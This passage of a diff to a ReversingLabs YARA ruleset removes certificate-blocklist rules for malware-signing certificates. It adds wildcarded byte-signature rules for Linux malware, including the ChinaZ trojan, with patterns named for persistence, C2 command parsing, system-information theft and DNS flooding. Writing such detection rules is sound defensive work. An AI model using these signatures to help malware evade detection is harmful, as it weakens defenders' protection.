+            BE ?? ?? ?? ?? 48 83 EB ?? 4C 39 F3 0F 85 ?? ?? ?? ?? 4C 8D A4 24 ?? ?? ?? ?? 48 8B
+            B4 24 ?? ?? ?? ?? B9 ?? ?? ?? ?? BA ?? ?? ?? ?? 4C 89 E7 E8 ?? ?? ?? ?? 48 8B 84 24
+            ?? ?? ?? ?? 48 83 78 ?? ?? 0F 84 ?? ?? ?? ?? 48 8D 9C 24 ?? ?? ?? ?? 48 8D 94 24 ??
+            ?? ?? ?? BE ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? 48 8D AC 24 ?? ?? ?? ?? 31 C9 BA ??
+            ?? ?? ?? 48 89 DE 48 89 EF E8 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 48 83 EB ?? 49 39
+            DE 0F 85 ?? ?? ?? ?? 48 89 EE 4C 89 E7 E8 ?? ?? ?? ?? 48 8B B4 24 ?? ?? ?? ?? 48 8D
+            BC 24 ?? ?? ?? ?? 48 8B 56 ?? E8 ?? ?? ?? ?? 31 FF 4C 8B AC 24 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 89 C7 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 89 C6 48 8D BC 24 ?? ?? ??
+            ?? F7 EA 89 F1 89 F5 C1 F9 ?? C1 FA ?? 29 CA 69 D2 ?? ?? ?? ?? 29 D5 E8 ?? ?? ?? ??
+            48 8B 9C 24 ?? ?? ?? ?? 41 89 E8 31 C0 4C 89 E9 BE ?? ?? ?? ?? 48 89 E7 48 89 DA 48
+            83 EB ?? E8 ?? ?? ?? ?? 49 39 DE 89 C5 0F 85 ?? ?? ?? ?? 48 63 C5 48 8D 94 24 ?? ??
+            ?? ?? 48 8D BC 24 ?? ?? ?? ?? C6 04 04 ?? 48 89 E6 E8 ?? ?? ?? ?? 48 8D 94 24 ?? ??
+            ?? ?? 48 89 E6 4C 89 FF E8 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 48 83 EB ?? 49 39 DE
+            0F 85 ?? ?? ?? ?? 49 8D 5D ?? 49 39 DE 0F 85 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 48
+            83 EB ?? 49 39 DE 0F 85 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 48 83 EB ?? 49 39 DE 0F
+            85 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 48 83 EB ?? 49 39 DE 0F 85 ?? ?? ?? ?? 48 81
+            C4 ?? ?? ?? ?? 4C 89 F8 5B 5D 41 5C 41 5D 41 5E 41 5F C3
+        }
+		$persistence_mechanism_redhat_v7 = {
+            48 89 6C 24 ?? 4C 89 7C 24 ?? 48 89 5C 24 ?? 4C 89 64 24 ?? 4C 89 6C 24 ?? 4C 89 74
+            24 ?? 48 81 EC ?? ?? ?? ?? 48 8D 7C 24 ?? E8 ?? ?? ?? ?? 48 8B 6C 24 ?? 8B 7D ?? 4C
+            8D 7D ?? 81 C7 ?? ?? ?? ?? 48 63 FF E8 ?? ?? ?? ?? 48 89 C3 48 8D 7C 24 ?? 48 89 EE
+            E8 ?? ?? ?? ?? 4C 8B 64 24 ?? BE ?? ?? ?? ?? 48 89 DF 31 C0 4C 8D 74 24 ?? 4C 89 E2
+            E8 ?? ?? ?? ?? 48 98 48 8D 54 24 ?? 48 89 DE C6 04 18 ?? 4C 89 F7 E8 ?? ?? ?? ?? 48
+            8B 7C 24 ?? 31 F6 E8 ?? ?? ?? ?? 85 C0 74 ?? 4C 89 E1 4C 89 E2 BE ?? ?? ?? ?? 48 89
+            DF 49 89 E9 4D 89 E0 31 C0 E8 ?? ?? ?? ?? 48 8B 7C 24 ?? 41 89 C5 B9 ?? ?? ?? ?? 89
+            C2 48 89 DE E8 ?? ?? ?? ?? 48 8B 7C 24 ?? 31 F6 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ??
+            ?? 48 8B 54 24 ?? 48 89 DF BE ?? ?? ?? ?? 31 C0 E8 ?? ?? ?? ?? 48 89 DF E8 ?? ?? ??
+            ?? 4C 89 E2 BE ?? ?? ?? ?? 48 89 DF 31 C0 E8 ?? ?? ?? ?? 48 98 48 89 E7 31 C9 C6 04
+            18 ?? BA ?? ?? ?? ?? 48 89 DE E8 ?? ?? ?? ?? 48 8B 2C 24 BE ?? ?? ?? ?? 48 89 EF E8
+            ?? ?? ?? ?? 48 85 C0 0F 84 ?? ?? ?? ?? 48 89 DF 48 8D 5D ?? BD ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 48 39 EB 0F 85 ?? ?? ?? ?? 48 8B 5C 24 ?? 48 83 EB ?? 48 39 DD 0F 85 ?? ?? ??
+            ?? 49 8D 5C 24 ?? 48 39 DD 0F 85 ?? ?? ?? ?? 49 81 FF ?? ?? ?? ?? 0F 85 ?? ?? ?? ??
+            48 8B 5C 24 ?? 48 8B 6C 24 ?? 4C 8B 64 24 ?? 4C 8B AC 24 ?? ?? ?? ?? 4C 8B B4 24 ??
+            ?? ?? ?? 4C 8B BC 24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? C3
+        }
+		$get_device_name_v7 = {
+            48 89 5C 24 ?? 48 89 6C 24 ?? BE ?? ?? ?? ?? 4C 89 64 24 ?? 4C 89 6C 24 ?? B9 ?? ??
+            ?? ?? 4C 89 74 24 ?? 48 81 EC ?? ?? ?? ?? 4C 8B 05 ?? ?? ?? ?? 48 8D 5C 24 ?? BA ??
+            ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? 48 89 DE BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 5C 24
+            ?? 41 BD ?? ?? ?? ?? 48 83 EB ?? 4C 39 EB 0F 85 ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 48
+            83 78 ?? ?? 75 ?? 48 8D 5C 24 ?? 48 89 DF E8 ?? ?? ?? ?? 48 89 DE BF ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 48 8B 5C 24 ?? 48 83 EB ?? 49 39 DD 0F 85 ?? ?? ?? ?? 48 8B 0D ?? ?? ??
+            ?? 48 8B 15 ?? ?? ?? ?? BE ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 7C 24 ??
+            E8 ?? ?? ?? ?? 4C 8B 64 24 ?? 48 89 E7 E8 ?? ?? ?? ?? 48 8B 2C 24 48 8D 5C 24 ?? 41
+            B8 ?? ?? ?? ?? 4C 89 E2 BE ?? ?? ?? ?? 31 C0 48 89 DF 48 89 E9 E8 ?? ?? ?? ?? 48 89
+            DE BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 5C 24 ?? 48 83 EB ?? 49 39 DD 0F 85 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 48 8D 5D ?? 49 39 DD 0F 85 ?? ?? ?? ?? 49 8D 5C 24 ?? 49 39 DD 0F
+            85 ?? ?? ?? ?? 48 8B 5C 24 ?? 48 8B 6C 24 ?? 4C 8B 64 24 ?? 4C 8B 6C 24 ?? 4C 8B B4
+            24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? C3
+        }
+		$generate_machine_id_v7 = {
+            41 57 31 C9 BA ?? ?? ?? ?? BE ?? ?? ?? ?? 49 89 FF 41 56 41 55 41 54 55 53 48 81 EC
+            ?? ?? ?? ?? 4C 8D A4 24 ?? ?? ?? ?? 48 8D AC 24 ?? ?? ?? ?? 4C 89 E7 E8 ?? ?? ?? ??
+            48 8B B4 24 ?? ?? ?? ?? B9 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 89 EF E8 ?? ?? ?? ?? 48 8B
+            84 24 ?? ?? ?? ?? 48 83 78 ?? ?? 0F 84 ?? ?? ?? ?? 48 8D 9C 24 ?? ?? ?? ?? 31 C9 BA
+            ?? ?? ?? ?? BE ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? 48 89 DE 48 89 EF E8 ?? ?? ?? ??
+            48 8B B4 24 ?? ?? ?? ?? 48 8D BC 24 ?? ?? ?? ?? 48 8B 56 ?? E8 ?? ?? ?? ?? 31 FF 4C
+            8B B4 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 C7 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? BA ?? ?? ??
+            ?? 89 C6 48 8D BC 24 ?? ?? ?? ?? F7 EA 89 F1 89 F5 C1 F9 ?? C1 FA ?? 29 CA 69 D2 ??
+            ?? ?? ?? 29 D5 E8 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 41 89 E8 31 C0 4C 89 F1 BE ??
+            ?? ?? ?? 48 89 E7 41 BD ?? ?? ?? ?? 48 89 DA 48 83 EB ?? E8 ?? ?? ?? ?? 4C 39 EB 89
+            C5 0F 85 ?? ?? ?? ?? 48 63 C5 48 8D 94 24 ?? ?? ?? ?? 48 8D BC 24 ?? ?? ?? ?? C6 04
+            04 ?? 48 89 E6 E8 ?? ?? ?? ?? 48 8D 94 24 ?? ?? ?? ?? 48 89 E6 4C 89 FF E8 ?? ?? ??
+            ?? 48 8B 9C 24 ?? ?? ?? ?? 48 83 EB ?? 49 39 DD 0F 85 ?? ?? ?? ?? 49 8D 5E ?? 49 39
+            DD 0F 85 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 48 83 EB ?? 49 39 DD 0F 85 ?? ?? ?? ??
+            48 8B 9C 24 ?? ?? ?? ?? 48 83 EB ?? 49 39 DD 0F 85 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ??
+            ?? 48 83 EB ?? 49 39 DD 0F 85 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? 4C 89 F8 5B 5D 41 5C
+            41 5D 41 5E 41 5F C3
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Select'Assistance Pro" and pe.signatures [ i ] . serial == "04:9c:e8:c4:7f:1f:0e:65:0c:b0:86:f0:cf:a7:ca:53" and 1393804799 <= pe.signatures [ i ] . not_after )
+		uint32( 0 ) == 0x464C457F and ( ( $persistence_mechanism_ubuntu ) and ( all of ( $network_communication_* ) ) and ( ( ( $change_timestamp_and_read_config_v11 ) and ( $persistence_mechanism_redhat_v11 ) and ( $generate_machine_id_v11 ) ) or ( ( $persistence_mechanism_redhat_v7 ) and ( $get_device_name_v7 ) and ( $generate_machine_id_v7 ) ) ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_29F42680E653Cf8Fafd0E935553F7E86 : INFO FILE
+rule REVERSINGLABS_Linux_Trojan_Chinaz : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects ChinaZ trojan."
 		author = "ReversingLabs"
-		id = "f616e92c-ed9f-581c-aa15-970bddfb073a"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "f99c224b-db54-5cae-b5fb-8939ebee3250"
+		date = "2024-07-31"
+		modified = "2024-07-31"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L279-L295"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "6c726e4c2933a6472d256a18ea5265660ff035d05036ab9cae3409ab5a7c7598"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/backdoor/Linux.Trojan.ChinaZ.yara#L1-L246"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "d8d08f4f3f36ecc7b219b6b1aae3c76d26e8fb3a44444763929190c6124532ff"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Trojan"
+		tc_detection_name = "ChinaZ"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Wemade Entertainment co.,Ltd" and pe.signatures [ i ] . serial == "29:f4:26:80:e6:53:cf:8f:af:d0:e9:35:55:3f:7e:86" and 1390175999 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_0C15 : INFO FILE
-{
-	meta:
-		description = "Certificate used for digitally signing malware."
-		author = "ReversingLabs"
-		id = "4a7a5404-1a20-53a7-9670-6f5215582c9d"
-		date = "2023-11-08"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L297-L313"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "1ee88813270dddeeedd90edbce9be2ce74303a6799ee64b0e9bfaea7377d3b2d"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$collect_system_information_32_p1 = {
+            55 57 56 53 81 EC ?? ?? ?? ?? 8D 5C 24 ?? 89 1C 24 E8 ?? ?? ?? ?? 8D 84 24 ?? ?? ??
+            ?? 89 44 24 ?? 89 5C 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 04 24
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24
+            ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 31 31 C9 89 C6 8D 44 24 ?? 31
+            FF C7 44 24 ?? ?? ?? ?? ?? 01 CE 89 04 24 11 D7 E8 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 0F 31 89 C1 31 C0 31 DB 01 C1 8D 44 24 ?? 11 D3 C7 44 24 ?? ?? ?? ??
+            ?? 89 04 24 89 4C 24 ?? E8 ?? ?? ?? ?? 8B 4C 24 ?? 8B 44 24 ?? C7 04 24 ?? ?? ?? ??
+            29 F1 19 FB 31 ED 2B 44 24 ?? 89 4C 24 ?? 8D B4 24 ?? ?? ?? ?? 89 5C 24 ?? 89 F7 69
+            C0 ?? ?? ?? ?? DF 6C 24 ?? 03 44 24 ?? 2B 44 24 ?? D9 7C 24 ?? 89 44 24 ?? DB 44 24
+            ?? DE F9 0F B7 44 24 ?? B4 ?? 66 89 44 24 ?? D9 6C 24 ?? DB 5C 24 ?? D9 6C 24 ?? 8B
+            5C 24 ?? E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 5C 24 ??
+            8D 9C 24 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? 89 44 24 ?? E8 ?? ?? ?? ?? A1
+        }
+		$collect_system_information_32_p2 = {
+            C7 04 24 ?? ?? ?? ?? A3 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? C7 44 24 ?? ?? ??
+            ?? ?? C7 04 24 ?? ?? ?? ?? 89 44 24 ?? E8 ?? ?? ?? ?? 89 E8 B9 ?? ?? ?? ?? F3 AB 89
+            DF B1 ?? F3 AB 89 DF 89 5C 24 ?? 89 74 24 ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D
+            44 24 ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 1C 24 C7 44 24 ?? ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 8B 54 24 ?? 89 E8 B9 ?? ?? ?? ?? F3 AB 89 F7 C7 44 24 ?? ?? ?? ?? ?? 89 D0
+            C1 F8 ?? C1 E8 ?? 01 D0 C1 F8 ?? 89 44 24 ?? 89 1C 24 89 44 24 ?? E8 ?? ?? ?? ?? C7
+            44 24 ?? ?? ?? ?? ?? 89 5C 24 ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 04 24 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? 89 C2 A1 ?? ?? ??
+            ?? 89 54 24 ?? 89 44 24 ?? E8 ?? ?? ?? ?? 89 E8 B9 ?? ?? ?? ?? F3 AB 89 DF B1 ?? F3
+            AB 89 5C 24 ?? 89 74 24 ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 54 24 ?? 85 D2 0F
+            85 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 5C 24 ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ??
+            ?? A1 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 04
+            24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ??
+            ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? 5B 5E 5F 5D
+            C3
+        }
+		$send_system_info_32 = {
+            57 56 53 81 EC ?? ?? ?? ?? 8D 5C 24 ?? 89 1C 24 E8 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ??
+            89 44 24 ?? 89 5C 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 04 24 ??
+            ?? ?? ?? E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            0F 31 31 C9 89 C6 8D 44 24 ?? 31 FF C7 44 24 ?? ?? ?? ?? ?? 01 CE 89 04 24 11 D7 E8
+            ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 31 89 C1 31 C0 31 DB 01 C1 8D 44
+            24 ?? 11 D3 C7 44 24 ?? ?? ?? ?? ?? 89 04 24 89 4C 24 ?? E8 ?? ?? ?? ?? 8B 4C 24 ??
+            8B 44 24 ?? C7 04 24 ?? ?? ?? ?? 29 F1 19 FB 2B 44 24 ?? 89 4C 24 ?? 89 5C 24 ?? 69
+            C0 ?? ?? ?? ?? DF 6C 24 ?? 03 44 24 ?? 2B 44 24 ?? D9 7C 24 ?? 89 44 24 ?? DB 44 24
+            ?? DE F9 0F B7 44 24 ?? B4 ?? 66 89 44 24 ?? D9 6C 24 ?? DB 5C 24 ?? D9 6C 24 ?? 8B
+            5C 24 ?? E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 5C 24 ??
+            C7 04 24 ?? ?? ?? ?? 89 44 24 ?? E8 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? A1 ?? ?? ?? ?? C7
+            44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 54 24 ?? 89 44 24 ?? C7 04 24 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ??
+            89 04 24 E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? B8 ?? ?? ?? ?? 5B 5E 5F C3
+        }
+		$parse_c2_commands_32 = {
+            55 31 C0 57 B9 ?? ?? ?? ?? 56 53 81 EC ?? ?? ?? ?? 8D 9C 24 ?? ?? ?? ?? 0F B6 94 24
+            ?? ?? ?? ?? 89 DF F3 AB C7 04 24 ?? ?? ?? ?? 88 94 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D
+            84 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 83 E0 ?? 89 84 24 ?? ?? ?? ?? 90 A1 ?? ?? ??
+            ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 5C 24 ?? 89 04 24 E8 ?? ?? ??
+            ?? 85 C0 0F 84 ?? ?? ?? ?? 8B B4 24 ?? ?? ?? ?? 85 F6 0F 84 ?? ?? ?? ?? 89 74 24 ??
+            C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 83 F8 ?? 74 ?? 83 F8 ?? 0F
+            84 ?? ?? ?? ?? 83 FE ?? 0F 84 ?? ?? ?? ?? 83 FE ?? 0F 84 ?? ?? ?? ?? 83 F8 ?? 0F 84
+            ?? ?? ?? ?? 83 FE ?? 0F 84 ?? ?? ?? ?? 83 FE ?? 0F 84 ?? ?? ?? ?? 83 FE ?? 0F 84 ??
+            ?? ?? ?? 83 FE ?? 0F 85 ?? ?? ?? ?? 31 C0 B9 ?? ?? ?? ?? 8D BC 24 ?? ?? ?? ?? F3 AB
+            8D B4 24 ?? ?? ?? ?? B0 ?? 8D BC 24 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? B1 ?? F3 A5 89
+            D6 8B BC 24 ?? ?? ?? ?? F7 C7 ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? F7 C7 ?? ?? ?? ?? 0F 85
+            ?? ?? ?? ?? 89 C1 C1 E9 ?? A8 ?? F3 A5 0F 85 ?? ?? ?? ?? A8 ?? 0F 85 ?? ?? ?? ?? 89
+            54 24 ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ??
+            81 C4 ?? ?? ?? ?? B8 ?? ?? ?? ?? 5B 5E 5F 5D C3
+        }
+		$dns_flood_32_p1 = {
+            55 57 56 53 81 EC ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 5C 24 ?? 8B
+            B4 24 ?? ?? ?? ?? B8 ?? ?? ?? ?? F6 C3 ?? 89 DF 0F 85 ?? ?? ?? ?? 89 C1 C1 E9 ?? A8
+            ?? F3 A5 0F 85 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8D B4 24 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ??
+            89 F7 89 44 24 ?? E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7
+            44 24 ?? ?? ?? ?? ?? 66 C7 44 24 ?? ?? ?? 66 C7 44 24 ?? ?? ?? E8 ?? ?? ?? ?? 31 D2
+            C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? F7 35 ?? ?? ??
+            ?? 8B 04 95 ?? ?? ?? ?? 89 44 24 ?? E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 C5 8D
+            44 24 ?? 89 44 24 ?? 89 2C 24 E8 ?? ?? ?? ?? 31 C0 B9 ?? ?? ?? ?? F3 AB 8D 54 24 ??
+            89 14 24 C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 89 5C 24 ?? 89 84 24 ??
+            ?? ?? ?? 0F B7 44 24 ?? 66 89 84 24 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 89 04 24 E8 ??
+            ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 89 14 24 89 74 24 ?? 89 54 24 ?? C6 84 24 ?? ?? ?? ??
+            ?? C6 84 24 ?? ?? ?? ?? ?? 66 C7 84 24 ?? ?? ?? ?? ?? ?? 66 C7 84 24 ?? ?? ?? ?? ??
+            ?? 66 C7 84 24 ?? ?? ?? ?? ?? ?? 66 C7 84 24 ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 54
+        }
+		$dns_flood_32_p2 = {
+            24 ?? 89 D1 8B 39 83 C1 ?? 8D 87 ?? ?? ?? ?? F7 D7 21 F8 25 ?? ?? ?? ?? 74 ?? A9 ??
+            ?? ?? ?? 0F 84 ?? ?? ?? ?? 00 C0 89 D7 83 D9 ?? 29 D1 8D 84 0C ?? ?? ?? ?? 66 C7 00
+            ?? ?? 66 C7 40 ?? ?? ?? 8B 0F 83 C7 ?? 8D 81 ?? ?? ?? ?? F7 D1 21 C8 25 ?? ?? ?? ??
+            74 ?? A9 ?? ?? ?? ?? 75 ?? C1 E8 ?? 83 C7 ?? 00 C0 8D 44 24 ?? 83 DF ?? C7 44 24 ??
+            ?? ?? ?? ?? 29 D7 89 04 24 89 54 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 54 24 ?? 89 74
+            24 ?? 89 84 24 ?? ?? ?? ?? 0F B7 44 24 ?? 89 14 24 66 89 84 24 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 8D 94 24 ?? ?? ?? ?? 89 5C 24 ?? 89 14 24 E8 ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ??
+            83 B8 ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? E8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 83 C7 ?? 89 C2
+            C1 FA ?? F7 F9 8D 42 ?? 66 C1 C8 ?? 66 89 84 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 31 D2 C7
+            44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 7C 24 ?? 89 2C 24 F7 35 ?? ?? ?? ??
+            8B 04 95 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 89 54 24 ?? 89 44 24 ?? 8D 44 24 ?? 89 44
+            24 ?? E8 ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 83 80 ?? ?? ?? ?? ?? 83 90 ?? ?? ?? ?? ??
+            83 3D ?? ?? ?? ?? ?? 74 ?? C7 04 24 ?? ?? ?? ?? E8
+        }
+		$collect_system_information_64_p1 = {
+            41 55 41 54 55 53 48 81 EC ?? ?? ?? ?? 48 8D 7C 24 ?? E8 ?? ?? ?? ?? 4C 8D 84 24 ??
+            ?? ?? ?? 48 8D 4C 24 ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? BF ?? ?? ?? ?? 31 C0 E8 ?? ??
+            ?? ?? B9 ?? ?? ?? ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? BF ?? ?? ?? ?? 31 C0 E8 ?? ?? ??
+            ?? 0F 31 48 89 D3 48 8D 7C 24 ?? 31 F6 48 C1 E3 ?? 89 C0 48 01 C3 E8 ?? ?? ?? ?? BF
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 31 48 89 D5 48 8D 7C 24 ?? 31 F6 48 C1 E5 ?? 89 C0 45
+            31 E4 48 01 C5 E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 2B 44 24 ?? 48 29 DD 48 8B 54 24 ??
+            2B 54 24 ?? BF ?? ?? ?? ?? F2 48 0F 2A C5 48 8D AC 24 ?? ?? ?? ?? 69 C0 ?? ?? ?? ??
+            01 D0 F2 0F 2A C8 F2 0F 5E C1 F2 0F 2C D8 E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 89 C1 BE ??
+            ?? ?? ?? BF ?? ?? ?? ?? 31 C0 41 89 D8 48 8D 9C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 05
+            ?? ?? ?? ?? BF ?? ?? ?? ?? 89 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 15 ?? ?? ?? ?? BE
+            ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 4C 89 E0 B9 ?? ?? ?? ?? 48 89 EF F3 48 AB
+        }
+		$collect_system_information_64_p2 = {
+            48 89 DF 48 89 DA 48 89 EE B1 ?? F3 48 AB BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 54 24
+            ?? BE ?? ?? ?? ?? 48 89 DF 31 C0 C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 4C 89 E0 B9
+            ?? ?? ?? ?? 48 89 DF F3 48 AB 8B 44 24 ?? BE ?? ?? ?? ?? 48 89 DF 8D 90 ?? ?? ?? ??
+            85 C0 0F 49 D0 31 C0 C1 FA ?? 89 54 24 ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 89 DE BF
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 15 ?? ?? ?? ?? BE ??
+            ?? ?? ?? BF ?? ?? ?? ?? 41 89 C5 E8 ?? ?? ?? ?? 4C 89 E0 B9 ?? ?? ?? ?? 48 89 EF F3
+            48 AB 48 89 DF 48 89 DA 48 89 EE B1 ?? F3 48 AB BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 45 85
+            ED 75 ?? BA ?? ?? ?? ?? 48 89 DE BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 3D ?? ?? ?? ??
+            E8 ?? ?? ?? ?? BE ?? ?? ?? ?? BF ?? ?? ?? ?? 31 C0 E8 ?? ?? ?? ?? BE ?? ?? ?? ?? BF
